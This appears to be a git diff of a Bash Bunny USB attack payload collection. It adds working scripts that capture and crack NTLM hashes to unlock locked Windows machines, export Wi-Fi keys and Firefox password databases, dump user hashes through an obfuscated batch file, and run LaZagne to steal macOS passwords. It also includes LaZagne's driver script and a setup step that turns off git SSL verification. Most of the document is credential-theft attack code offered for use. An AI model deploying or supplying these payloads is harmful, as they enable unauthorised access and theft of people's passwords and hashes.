if [ -z "${TARGET_IP}" ]; then
|
||||
LED FAIL2
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Set LED yellow, run attack
|
||||
LED ATTACK
|
||||
cd /tools/responder
|
||||
|
||||
# Clean logs directory
|
||||
rm logs/*
|
||||
|
||||
# Run Responder with specified options
|
||||
python Responder.py -I usb0 $RESPONDER_OPTIONS &
|
||||
|
||||
# Wait until NTLM log is found
|
||||
until [ -f logs/*NTLM* ]
|
||||
do
|
||||
# Ima just loop here until NTLM logs are found
|
||||
sleep 1
|
||||
done
|
||||
|
||||
# copy logs to loot directory
|
||||
cp logs/* /root/loot/bunnypicker/$HOST-$COUNT
|
||||
cp logs/* $LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# Sync USB disk filesystem
|
||||
sync
|
||||
|
||||
#kill responder
|
||||
killall python
|
||||
killall python
|
||||
killall python
|
||||
|
||||
#Cracking begins!
|
||||
cd /tools/john
|
||||
LED STAGE1
|
||||
#This should be a small wordlist as we are looking for lowhanging fuit. We can do 100K passwords in ~1 second.
|
||||
#We could go CUCMBER PLAID here but its probably not needed
|
||||
./john --wordlist=$WORDFILE --pot=/root/loot/bunnypicker/$HOST-$COUNT/john.pot /root/loot/bunnypicker/$HOST-$COUNT/*.txt
|
||||
|
||||
|
||||
# Check john.pot If empty blink RED and end. Move to offline attack.
|
||||
if [[ -z $(grep '[^[:space:]]' /root/loot/bunnypicker/$HOST-$COUNT/john.pot) ]]; then
|
||||
LED FAIL3
|
||||
exit 1
|
||||
fi
|
||||
|
||||
#This will copy our cracked password to the loot folder for future use.
|
||||
LED STAGE2
|
||||
awk NR==1 /root/loot/bunnypicker/$HOST-$COUNT/john.pot | cut -d: -f2 > $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt
|
||||
echo -n "STRING " > $PAYLOAD_DIR/pass.txt
|
||||
cat $LOOTDIR/$HOST-$COUNT/$HOST-$COUNT-pass.txt >> $PAYLOAD_DIR/pass.txt
|
||||
|
||||
#This should unlock the machine with our cracked password.
|
||||
#$PAYLOAD_DIR would not work with QUACK
|
||||
QUACK ESC
|
||||
DELAY 100
|
||||
QUACK $SWITCH_POSITION/pass.txt
|
||||
QUACK ENTER
|
||||
rm $PAYLOAD_DIR/pass.txt
|
||||
|
||||
LED CLEANUP
|
||||
sync
|
||||
|
||||
# When the light turns green its a hacked machine.
|
||||
LED FINISH
|
|
@ -0,0 +1,117 @@
|
|||
# Bunnypicker (Win10 Lockpicker for Bash Bunny)
|
||||
.______ __ __ .__ __. .__ __. ____ ____ .______ __ ______ __ ___ _______ .______
|
||||
| _ \ | | | | | \ | | | \ | | \ \ / / | _ \ | | / || |/ / | ____|| _ \
|
||||
| |_) | | | | | | \| | | \| | \ \/ / | |_) | | | | ,----'| ' / | |__ | |_) |
|
||||
| _ < | | | | | . ` | | . ` | \_ _/ | ___/ | | | | | < | __| | /
|
||||
| |_) | | `--' | | |\ | | |\ | | | | | | | | `----.| . \ | |____ | |\ \----.
|
||||
|______/ \______/ |__| \__| |__| \__| |__| | _| |__| \______||__|\__\ |_______|| _| `._____|
|
||||
,
|
||||
/| __
|
||||
/ | ,-~ /
|
||||
Y :| // /
|
||||
| jj /( .^
|
||||
>-"~"-v"
|
||||
/ Y
|
||||
jo o |
|
||||
( ~T~ j
|
||||
>._-' _./
|
||||
/ "~" |
|
||||
Y _, |
|
||||
/| ;-"~ _ l
|
||||
/ l/ ,-"~ \
|
||||
\//\/ .- \
|
||||
Y / Y -Row
|
||||
l I !
|
||||
]\ _\ /"\
|
||||
(" ~----( ~ Y. )
|
||||
~~~~~~~~~~~~~~~~~~~~~~~~~~
|
||||
|
||||
|
||||
Author: rf_bandit
|
||||
Version: Version 1.0
|
||||
Credit: Hak5Darren, Mubix, catatonic, mame82
|
||||
Firmware: 1.7
|
||||
Target: Windows 10/11
|
||||
Date: May 2023
|
||||
|
||||
## Description
|
||||
This is based on Quickcreds, Jackalope, and Win10Lockpicker (for the OG P4wnP1)
|
||||
Snags credentials from locked machines
|
||||
Implements a responder attack. Saves creds to the loot folder on the USB Disk
|
||||
Looks for *NTLM* log files
|
||||
Cracks hash with John the Ripper. Best with a smaller dictionary.
|
||||
Saves cracked hash to loot folder
|
||||
Quacks password and unlocks machine
|
||||
|
||||
On a current (May 2023) Win10/Win11 machine, it shouldn't take more about 35 seconds to get a hash.
|
||||
If attack stage lasts longer than ~1, try disconnecting/reconnecting from wifi/network.
|
||||
We can run through 100K simple passwords in 1 second.
|
||||
Best time I got was 29.60 seconds from Bash Bunny boot to machine unlock.
|
||||
|
||||
|
||||
|
||||
## Configuration
|
||||
.
|
||||
Configured for Windows. Not tested on Mac/*nix
|
||||
The path to the wordfile needs to be configured, eg /tools/<your-file-here> or /tools/john/password.lst (included) . The most straightforwrd way to get a large wordlist is to put it in the /tools folder in arming mode. A future version could check for a wordlist in /tools and if not found fallback to the included /tools/john/password.lst.
|
||||
|
||||
|
||||
## Requirements
|
||||
|
||||
Responder must be in /tools/responder/
|
||||
(Can be otained from https://forums.hak5.org/topic/40971-info-tools/)
|
||||
JtR must be in /tools/john
|
||||
Requires initial setup (below)
|
||||
|
||||
## Initial Setup
|
||||
Install responder from https://forums.hak5.org/topic/40971-info-tools/
|
||||
|
||||
Replace /etc/apt/sources.list with:
|
||||
deb http://archive.debian.org/debian/ jessie main non-free contrib
|
||||
deb-src http://archive.debian.org/debian/ jessie main non-free contrib
|
||||
deb http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
|
||||
deb-src http://archive.debian.org/debian-security/ jessie/updates main non-free contrib
|
||||
|
||||
apt update (DO NOT RUN apt upgrade as it will break RNDIS_ETHERNET. Not entirely clear why.)
|
||||
|
||||
The john package included can't handle NTLM hashes so we will make our own.
|
||||
Install gcc and git if you don't have them.
|
||||
|
||||
apt-get install gcc
|
||||
|
||||
apt-get install git
|
||||
git config --global http.sslverify "false" (this is insecure but I'm not worried)
|
||||
|
||||
git clone https://github.com/openwall/john
|
||||
|
||||
cd john
|
||||
./configure && make
|
||||
mv run /tools/john
|
||||
cd ..
|
||||
rm -r john (not required but a space saving measure)
|
||||
|
||||
|
||||
## STATUS
|
||||
|
||||
|
||||
| Status | Description |
|
||||
| ------------------- | ---------------------------------------- |
|
||||
| LED SETUP | Starting |
|
||||
| LED ATTACK | Grabbing creds |
|
||||
| LED STAGE1 | Running JtR |
|
||||
| LED STAGE2 | Unlocking |
|
||||
| LED CLEANUP | Sync to disk |
|
||||
| LED FINISH | Trap is clean |
|
||||
| FAIL1 | Responder not found at /tools/responder |
|
||||
| FAIL2 | Target did not aquire IP address |
|
||||
| FAIL3 | Hash not cracked - move to offline attack|
|
||||
|
||||
## ADDITIONAL NOTES
|
||||
|
||||
For debugging its better to use LED B for STAGE1 and LED W for STAGE2 because its easier to pinpoint failure.
|
||||
A future version could check for a wordlist in /tools and if not found fallback to /tools/john/password.lst.
|
||||
Might also steal catatonic's use of the switch (very cool) to initiate password quacking to make the payload more versatile on both locked
|
||||
and unlocked machines.
|
||||
|
||||
This was fun to make. Thanks to everyone who put in all the hard work before me.
|
||||
|
|
@ -0,0 +1,6 @@
|
|||
mkdir %~dp0\loot\%COMPUTERNAME%
|
||||
cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear
|
||||
C: cd \D %appdata%\mozilla\firefox\profiles\
|
||||
cd %appdata%\mozilla\firefox\profiles\*.default-release\
|
||||
copy key4.db %~dp0\loot\%COMPUTERNAME%
|
||||
copy logins.json %~dp0\loot\%COMPUTERNAME%
|
|
@ -0,0 +1,45 @@
|
|||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
# Full Description
|
||||
# ----------------
|
||||
# Attacks an Unlocked Windows Machine
|
||||
# Payload targets:
|
||||
# - All WiFi creds
|
||||
# - Firefox Saved Password Database
|
||||
#
|
||||
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
|
||||
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
|
||||
|
||||
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
|
||||
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
|
||||
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
|
||||
|
||||
|
||||
# KNOWN ISSUES
|
||||
# ---------------
|
||||
# Loot is saved in Payloads/switch#/loot
|
||||
|
||||
|
||||
# Files
|
||||
# -----
|
||||
# - payload.txt: Starts the attack. All configuration contained in this file.
|
||||
# - FireSnatcher.bat: Worker that grabs Creds
|
||||
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
# - Place the payload.txt and FireSnatcher.bat in Payload folder
|
||||
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
|
||||
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
|
||||
|
||||
**LED meanings**
|
||||
- Magenta: Initial setup – about 1 – 3 seconds
|
||||
- Single yellow blink: Attack in progress
|
||||
- Green rapid flash, then solid, then off: Attack complete
|
|
@ -0,0 +1,78 @@
|
|||
# Title: FireSnatcher
|
||||
# Description: Copies Wifi Keys, and Firefox Password Databases
|
||||
# Author: KarrotKak3
|
||||
# Props: saintcrossbow & 0i41E
|
||||
# Version: 1.0.2.0 (Work in Progress)
|
||||
# Category: Credentials
|
||||
# Target: Windows (Logged in)
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
# Full Description
|
||||
# ----------------
|
||||
# Attacks an Unlocked Windows Machine
|
||||
# Payload targets:
|
||||
# - All WiFi creds
|
||||
# - Firefox Saved Password Database
|
||||
#
|
||||
# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
|
||||
# Delays to Allow Powershell Time to Open and to Give Attack time to Run
|
||||
|
||||
# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
|
||||
# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
|
||||
# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
|
||||
|
||||
|
||||
# KNOWN ISSUES
|
||||
# ---------------
|
||||
# Loot is saved in Payloads/switch#/loot
|
||||
|
||||
|
||||
# Files
|
||||
# -----
|
||||
# - payload.txt: Starts the attack. All configuration contained in this file.
|
||||
# - FireSnatcher.bat: Worker that grabs Creds
|
||||
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
# - Place the payload.txt and FireSnatcher.bat in Payload folder
|
||||
# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
|
||||
# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
|
||||
|
||||
# LEDs
|
||||
# ----
|
||||
# Magenta: Initial setup – about 1 – 3 seconds
|
||||
# Single yellow blink: Attack in progress
|
||||
# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed
|
||||
|
||||
# Options
|
||||
# -------
|
||||
# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
|
||||
BB_NAME="BashBunny"
|
||||
|
||||
# Setup
|
||||
# -----
|
||||
LED SETUP
|
||||
|
||||
|
||||
# Attack
|
||||
# ------
|
||||
ATTACKMODE HID STORAGE
|
||||
Q DELAY 500
|
||||
LED ATTACK
|
||||
Q DELAY 100
|
||||
Q GUI r
|
||||
Q DELAY 100
|
||||
Q STRING powershell Start-Process powershell
|
||||
Q ENTER
|
||||
Q DELAY 7000
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"
|
||||
Q ENTER
|
||||
Q DELAY 8000
|
||||
Q STRING EXIT
|
||||
Q ENTER
|
||||
sync
|
||||
LED FINISH
|
||||
Q DELAY 1500
|
||||
shutdown now
|
||||
|
|
@ -0,0 +1,20 @@
|
|||
**Title: HashDumpBunny**
|
||||
|
||||
Author: 0i41E
|
||||
|
||||
Version: 1.0
|
||||
|
||||
**Instruction:**
|
||||
|
||||
This payload will run an obfuscated script to dump user hashes. If you don't trust this obfuscated .bat file, you should run it within a save space first - which should be best practice anyways ;-)
|
||||
|
||||
#
|
||||
**!Depending on your Windows version, this might not work as intended!**
|
||||
#
|
||||
**Instruction:**
|
||||
|
||||
Place BunnyDump.bat in the same payload switch-folder as your payload.txt
|
||||
#
|
||||
Plug in BashBunny.
|
||||
Exfiltrate the out.txt file and try to crack the hashes.
|
||||
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/HashDumpBunny/censoredhash.png)
|
After Width: | Height: | Size: 13 KiB |
|
@ -0,0 +1,44 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: HashDumpBunny
|
||||
# Description: Dump user hashes with this script, which was obfuscated with multiple layers.
|
||||
# Author: 0i41E
|
||||
# Version: 1.0
|
||||
# Category: Credentials
|
||||
# Attackmodes: HID, Storage
|
||||
|
||||
LED SETUP
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
GET SWITCH_POSITION
|
||||
DUCKY_LANG de
|
||||
|
||||
Q DELAY 500
|
||||
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
|
||||
|
||||
LED STAGE1
|
||||
|
||||
#After you have adapted the delays for your target, add "-W hidden"
|
||||
Q DELAY 1000
|
||||
RUN WIN "powershell Start-Process powershell -Verb runAs"
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
Q ALT j
|
||||
Q DELAY 250
|
||||
|
||||
Q DELAY 250
|
||||
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\BunnyDump.bat')"
|
||||
Q DELAY 250
|
||||
Q STRING " ;mv out.txt ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
|
||||
Q DELAY 250
|
||||
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
|
||||
Q DELAY 250
|
||||
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
LED FINISH
|
|
@ -28,7 +28,7 @@ mkdir -p $LOOTDIR
|
|||
|
||||
MSF_DIR=/tools/metasploit-framework
|
||||
|
||||
# Save environment informaiton:
|
||||
# Save environment information:
|
||||
echo "PAYLOAD_DIR: $PAYLOAD_DIR" >> $LOOTDIR/log.txt
|
||||
echo "MSF_DIR: $MSF_DIR" >> $LOOTDIR/log.txt
|
||||
echo "LOOTDIR: $LOOTDIR" >> $LOOTDIR/log.txt
|
||||
|
|
|
@ -26,7 +26,9 @@ Uses ethernet to attempt dictionary attacks against passwords. When the password
|
|||
To clear a stored password move the switch to switch3 (aka arming mode) after the payload runs and displays GREEN. The status light will change to SPECIAL (cyan) indicating the password has been removed. Positioning the switch to switch1 or switch2 will re-initiate the attack.
|
||||
|
||||
## Configuration
|
||||
No initial configuration is required for bunny firmware v1.6+.
|
||||
You must have a Metasploit installation up and running in path /tools/metasploit-framework/
|
||||
Information and instructions for the installation of additional tools to the Bash Bunny can be found [here](https://docs.hak5.org/hc/en-us/articles/360010554133-Installing-and-using-additional-tools).
|
||||
No further initial configuration is required for Firmware v1.6+.
|
||||
|
||||
### Per attack configuration
|
||||
1. userlist.txt contains usernames to use in attack.
|
||||
|
|
|
@ -0,0 +1,238 @@
|
|||
# -*- coding: utf-8 -*-
|
||||
# !/usr/bin/python
|
||||
|
||||
##############################################################################
|
||||
# #
|
||||
# By Alessandro ZANNI #
|
||||
# #
|
||||
##############################################################################
|
||||
|
||||
# Disclaimer: Do Not Use this program for illegal purposes ;)
|
||||
|
||||
import argparse
|
||||
import logging
|
||||
import sys
|
||||
import os
|
||||
import time
|
||||
|
||||
# Configuration
|
||||
from lazagne.config.write_output import write_in_file, StandardOutput
|
||||
from lazagne.config.manage_modules import get_categories
|
||||
from lazagne.config.constant import constant
|
||||
from lazagne.config.run import run_lazagne, create_module_dic
|
||||
|
||||
|
||||
# Object used to manage the output / write functions (cf write_output file)
|
||||
constant.st = StandardOutput()
|
||||
modules = create_module_dic()
|
||||
|
||||
|
||||
def output(output_dir=None, txt_format=False, json_format=False, all_format=False):
|
||||
if output_dir:
|
||||
if os.path.isdir(output_dir):
|
||||
constant.folder_name = output_dir
|
||||
else:
|
||||
print('[!] Specify a directory, not a file !')
|
||||
|
||||
if txt_format:
|
||||
constant.output = 'txt'
|
||||
|
||||
if json_format:
|
||||
constant.output = 'json'
|
||||
|
||||
if all_format:
|
||||
constant.output = 'all'
|
||||
|
||||
if constant.output:
|
||||
if not os.path.exists(constant.folder_name):
|
||||
os.makedirs(constant.folder_name)
|
||||
# constant.file_name_results = 'credentials' # let the choice of the name to the user
|
||||
|
||||
if constant.output != 'json':
|
||||
constant.st.write_header()
|
||||
|
||||
|
||||
def quiet_mode(is_quiet_mode=False):
|
||||
if is_quiet_mode:
|
||||
constant.quiet_mode = True
|
||||
|
||||
|
||||
def verbosity(verbose=0):
|
||||
# Write on the console + debug file
|
||||
if verbose == 0:
|
||||
level = logging.CRITICAL
|
||||
elif verbose == 1:
|
||||
level = logging.INFO
|
||||
elif verbose >= 2:
|
||||
level = logging.DEBUG
|
||||
|
||||
formatter = logging.Formatter(fmt='%(message)s')
|
||||
stream = logging.StreamHandler(sys.stdout)
|
||||
stream.setFormatter(formatter)
|
||||
root = logging.getLogger()
|
||||
root.setLevel(level)
|
||||
# If other logging are set
|
||||
for r in root.handlers:
|
||||
r.setLevel(logging.CRITICAL)
|
||||
root.addHandler(stream)
|
||||
|
||||
|
||||
def manage_advanced_options(user_password=None, dictionary_attack=None):
|
||||
if user_password:
|
||||
constant.user_password = user_password
|
||||
|
||||
if dictionary_attack:
|
||||
constant.dictionary_attack = dictionary_attack
|
||||
|
||||
|
||||
def clean_args(arg):
|
||||
"""
|
||||
Remove not necessary values to get only subcategories
|
||||
"""
|
||||
for i in ['output', 'write_normal', 'write_json', 'write_all', 'verbose', 'auditType', 'quiet']:
|
||||
try:
|
||||
del arg[i]
|
||||
except Exception:
|
||||
pass
|
||||
return arg
|
||||
|
||||
|
||||
def runLaZagne(category_selected='all', subcategories={}, password=None, interactive=False):
|
||||
"""
|
||||
This function will be removed, still there for compatibility with other tools
|
||||
Everything is on the config/run.py file
|
||||
"""
|
||||
for pwd_dic in run_lazagne(
|
||||
category_selected=category_selected,
|
||||
subcategories=subcategories,
|
||||
password=password,
|
||||
interactive=interactive
|
||||
):
|
||||
yield pwd_dic
|
||||
|
||||
|
||||
if __name__ == '__main__':
|
||||
|
||||
parser = argparse.ArgumentParser(description=constant.st.banner, formatter_class=argparse.RawTextHelpFormatter)
|
||||
parser.add_argument('--version', action='version', version='Version ' + str(constant.CURRENT_VERSION),
|
||||
help='laZagne version')
|
||||
|
||||
# ------------------------------------------- Permanent options ------------------------------------------
|
||||
# Version and verbosity
|
||||
PPoptional = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
PPoptional._optionals.title = 'optional arguments'
|
||||
PPoptional.add_argument('-i', '--interactive', default=False, action='store_true',
|
||||
help='will prompt a window to the user')
|
||||
PPoptional.add_argument('-password', dest='password', action='store',
|
||||
help='user password used to decrypt the keychain')
|
||||
PPoptional.add_argument('-attack', dest='attack', action='store_true',
|
||||
help='500 well known passwords used to check the user hash (could take a while)')
|
||||
PPoptional.add_argument('-v', dest='verbose', action='count', help='increase verbosity level', default=0)
|
||||
PPoptional.add_argument('-quiet', dest='quiet', action='store_true',
|
||||
help='quiet mode: nothing is printed to the output', default=False, )
|
||||
|
||||
# Output
|
||||
PWrite = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
PWrite._optionals.title = 'Output'
|
||||
PWrite.add_argument('-oN', dest='write_normal', action='store_true', help='output file in a readable format')
|
||||
PWrite.add_argument('-oJ', dest='write_json', action='store_true', help='output file in a json format')
|
||||
PWrite.add_argument('-oA', dest='write_all', action='store_true', help='output file in all format')
|
||||
PWrite.add_argument('-output', dest='output', action='store', help='destination path to store results (default:.)',
|
||||
default='.')
|
||||
|
||||
# -------------------------------- Add options and suboptions to all modules ------------------------------
|
||||
all_subparser = []
|
||||
categories = get_categories()
|
||||
for c in categories:
|
||||
categories[c]['parser'] = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
categories[c]['parser']._optionals.title = categories[c]['help']
|
||||
|
||||
# Manage options
|
||||
categories[c]['subparser'] = []
|
||||
for module in modules[c]:
|
||||
m = modules[c][module]
|
||||
categories[c]['parser'].add_argument(m.options['command'], action=m.options['action'], dest=m.options['dest'],
|
||||
help=m.options['help'])
|
||||
|
||||
# Manage all sub options by modules
|
||||
if m.suboptions:
|
||||
tmp = []
|
||||
for sub in m.suboptions:
|
||||
tmp_subparser = argparse.ArgumentParser(
|
||||
add_help=False,
|
||||
formatter_class=lambda prog: argparse.HelpFormatter(prog, max_help_position=constant.MAX_HELP_POSITION)
|
||||
)
|
||||
tmp_subparser._optionals.title = sub['title']
|
||||
if 'type' in sub:
|
||||
tmp_subparser.add_argument(sub['command'], type=sub['type'], action=sub['action'],
|
||||
dest=sub['dest'], help=sub['help'])
|
||||
else:
|
||||
tmp_subparser.add_argument(sub['command'], action=sub['action'], dest=sub['dest'],
|
||||
help=sub['help'])
|
||||
tmp.append(tmp_subparser)
|
||||
all_subparser.append(tmp_subparser)
|
||||
categories[c]['subparser'] += tmp
|
||||
|
||||
# ------------------------------------------- Print all -------------------------------------------
|
||||
parents = [PPoptional] + all_subparser + [PWrite]
|
||||
dic = {'all': {'parents': parents, 'help': 'Run all modules'}}
|
||||
for c in categories:
|
||||
parser_tab = [PPoptional, categories[c]['parser']]
|
||||
if 'subparser' in categories[c]:
|
||||
if categories[c]['subparser']:
|
||||
parser_tab += categories[c]['subparser']
|
||||
parser_tab += [PWrite]
|
||||
dic_tmp = {c: {'parents': parser_tab, 'help': 'Run %s module' % c}}
|
||||
dic = dict(list(dic.items()) + list(dic_tmp.items()))
|
||||
|
||||
subparsers = parser.add_subparsers(help='Choose a main command')
|
||||
for d in dic:
|
||||
subparsers.add_parser(d, parents=dic[d]['parents'], help=dic[d]['help']).set_defaults(auditType=d)
|
||||
|
||||
# ------------------------------------------- Parse arguments -------------------------------------------
|
||||
|
||||
if len(sys.argv) == 1:
|
||||
parser.print_help()
|
||||
sys.exit(1)
|
||||
|
||||
args = dict(parser.parse_args()._get_kwargs())
|
||||
arguments = parser.parse_args()
|
||||
|
||||
# Define constant variables
|
||||
output(
|
||||
output_dir=args['output'],
|
||||
txt_format=args['write_normal'],
|
||||
json_format=args['write_json'],
|
||||
all_format=args['write_all']
|
||||
)
|
||||
verbosity(verbose=args['verbose'])
|
||||
manage_advanced_options(user_password=args.get('password', None), dictionary_attack=args.get('attack', None))
|
||||
quiet_mode(is_quiet_mode=args['quiet'])
|
||||
|
||||
# Print the title
|
||||
constant.st.first_title()
|
||||
|
||||
start_time = time.time()
|
||||
|
||||
category_selected = args['auditType']
|
||||
subcategories = clean_args(args)
|
||||
|
||||
for r in runLaZagne(
|
||||
category_selected=category_selected,
|
||||
subcategories=subcategories,
|
||||
password=args.get('password', None),
|
||||
interactive=arguments.interactive
|
||||
):
|
||||
pass
|
||||
|
||||
write_in_file(constant.stdout_result)
|
||||
constant.st.print_footer(elapsed_time=str(time.time() - start_time))
|
|
@ -0,0 +1,44 @@
|
|||
#!/bin/bash
|
||||
#
|
||||
# Title: Mac Password Grabber
|
||||
# Author: Overtimedev
|
||||
# Version: 1.0
|
||||
#
|
||||
# Steals Passwords Mac using laZagne.py then stashes them in /root/udisk/loot/MacPass
|
||||
# s(Replace PASSWORD, with your vicims mac computer password in payload.txt)
|
||||
#
|
||||
# Amber..............Executing payload
|
||||
# Green..............Finished
|
||||
#
|
||||
|
||||
LED G R
|
||||
ATTACKMODE HID STORAGE
|
||||
|
||||
lootdir=loot/MacPass
|
||||
mkdir -p /root/udisk/$lootdir
|
||||
|
||||
QUACK GUI SPACE
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING terminal
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING cd /Volumes/BashBunny/
|
||||
QUACK ENTER
|
||||
QUACK DELAY 1000
|
||||
QUACK STRING python get-pip.py
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING pip install -r requirements.txt
|
||||
QUACK ENTER
|
||||
QUACK DELAY 3000
|
||||
QUACK STRING python laZagne.py all -password PASSWORD -oN -output loot/MacPass
|
||||
QUACK ENTER
|
||||
QUACK DELAY 10000
|
||||
QUACK STRING killall Terminal
|
||||
QUACK ENTER
|
||||
|
||||
# Sync filesystem
|
||||
sync
|
||||
|
||||
# Green LED for finished
|
||||
LED G
|
|
@ -0,0 +1,25 @@
|
|||
# Mac Password Grabber for the BashBunny
|
||||
|
||||
* Author: Overtimedev
|
||||
* Version: Version 1.0
|
||||
* Target: OSX
|
||||
|
||||
## Description
|
||||
|
||||
Steals Mac Passwords using laZagne.py then stashes them in /loot/MacPass
|
||||
|
||||
|
||||
|
||||
1. put get-pip.py, laZagne.py and requirements.txt in the root folder of the bunny
|
||||
|
||||
2. unzip lazagne.zip into the root folder of the bunny
|
||||
|
||||
3. Replace PASSWORD, with your vicims mac computer password in payload.txt
|
||||
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Amber | Executin Payload |
|
||||
| Green | Attack Finished |
|
|
@ -0,0 +1,8 @@
|
|||
psutil; sys_platform == 'linux' or sys_platform == 'linux2'
|
||||
secretstorage; sys_platform == 'linux' or sys_platform == 'linux2'
|
||||
pyasn1
|
||||
enum34; python_version < '3.4' and sys_platform == 'win32'
|
||||
rsa; sys_platform == 'win32'
|
||||
https://github.com/AlessandroZ/pypykatz/archive/master.zip; python_version < '3.4' and sys_platform == 'win32'
|
||||
https://github.com/skelsec/pypykatz/archive/master.zip; python_version > '3.5' and sys_platform == 'win32'
|
||||
pycryptodome
|
|
@ -0,0 +1,2 @@
|
|||
挦獬
|
||||
